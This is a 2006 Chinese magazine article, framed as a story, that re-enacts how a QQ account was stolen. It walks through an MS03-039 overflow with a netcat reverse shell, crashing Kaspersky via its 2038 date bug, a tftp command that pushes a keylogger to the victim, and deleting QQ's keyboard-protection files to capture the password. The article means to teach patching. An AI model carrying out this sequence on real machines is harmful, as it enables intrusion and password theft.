不凡的黑客幻想 揭开QQ号被盗的谜团

2006-11-02 06:19SEAPIGLilyBaby
计算机应用文摘·触控 2006年10期
关键词:卡巴斯基被盗阿Q

SEAPIG LilyBaby

猖狂的盗号者

“阿Q,你的QQ被盗了。”我平静地通知阿Q。

“你就忽悠我吧,大哥。”

“真的,不信你看:本号被盗,要想找回此号……”(图1)

正在打CS的阿Q,一骨碌就从桌子对面翻了过来:“不是吧,我装的可是卡巴斯基啊。”

怎么办?赶紧到http://service.qq.com/申诉,还好他记性比较好,填了申诉表里的一大堆问题,但是要三天之后才有答复。

当初是我推荐阿Q装卡巴斯基的,这下QQ号被盗了,我也挺过意不去。让他仔细回忆一下被盗经过,阿Q说曾经碰到一次QQ突然关了,以为程序出错所以再次登录,接着卡巴斯基也崩溃了。

找找被盗的原因

由此看来,遭遇盗号木马了。可令人不解的是,卡巴斯基怎么崩溃了呢?众所周知,卡巴斯基的进程保护相当强大,除了“冰刃”能“杀”掉其进程,无论是WinXP自带的NTSD还是大名鼎鼎的PSkill都奈何不了。留下的惟一线索就是系统时间被改成了2038年,也就是这一改动让卡巴斯基放水了。

说装了卡巴斯基,病毒木马入侵的几率比较小,那么系统漏洞的威胁就比较大了。用X-Scan一扫,MS03026、MS03039、MS03049、MS04011等高危溢出漏洞一大堆,惨不忍睹。

“你哪年装的系统啊?那么多重要的补丁都没打,想必这就是盗号者下手的地方了。”

“怎么下手?不凡你给我演示下,我要搞清楚,免得下次再中招。”

模拟第一现场

因为已经知道了阿Q的电脑上有很多漏洞没打补丁,我在自己的电脑上使用MS03039溢出工具,再加上NC反向连接,很轻松就获取了CMD Shell(图1)。具体方法请参考《激情溢出三部曲》(本刊今年2月上旬刊),在此不再赘述。

在获取C M D S h e l l 后, 用“tasklist”查看进程获知装有卡巴斯基。面对虎视眈眈的卡巴斯基,要想上传盗号工具难于上青天,关键在于卡巴斯基的相关进程没法终止。可最近卡巴斯基爆出了2038漏洞,只要修改一下时间,卡巴斯基就崩溃了,这就给了盗号者可乘之机(以下乃模拟盗号情景,切勿模仿)。

我又从硬盘里找出两个工具,《窗口键盘记录器》和TFTP32,前者用于捕捉键盘记录,用后者把它送到阿Q的电脑里去。

将《窗口键盘记录器》主程序keylog放至TFTP32所在目录,运行TFTP32开启FTP服务(图3)。图标还在,给人还在运行的假象。

QQ2005 Beta3之后的版本对键盘输入采取了保护措施,使得键盘记录程序无法捕获输入字符。将QQ安装目录下的npkcrypt.vxd、npkcrypt.sys、npkcusb.sys三个文件删除后,键盘保护就失效了。再删除LoginUinList.dat,这样可以清除QQ记录的号码,在登录时要重新输入。

利用“tftp –i 192.168.1.9 GET keylog.e x e”命令将键盘记录程序上传至目标主机并运行。用tasklist命令获取QQ进程的P I D,再用“ntsd -c q -p PID”结束Q Q 进程。5分钟之后,将C : WindowsSystem32目录下的11111.txt拷贝过来,里面就有QQ账号和密码(图6)。

“这,这就被偷走了啊?” 阿Q目瞪口呆。

“对付不设防的电脑,那还不是轻而易举。快回去重装系统并打补丁吧。”

本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。

猜你喜欢
卡巴斯基被盗阿Q
阿Q和老A
沈鹏《读鲁迅〈阿Q正传〉(四首选二)》
卡巴斯基2016新品开启预售
卡巴斯基企业级产品荣膺欧洲SC杂志权威奖项
卡巴斯基解决方案与Windows 8.1实现兼容
2013卡巴斯基三大安全事件
论描写辛亥革命之于《阿Q正传》的意义
阿Q“国民劣根性”的误植与误读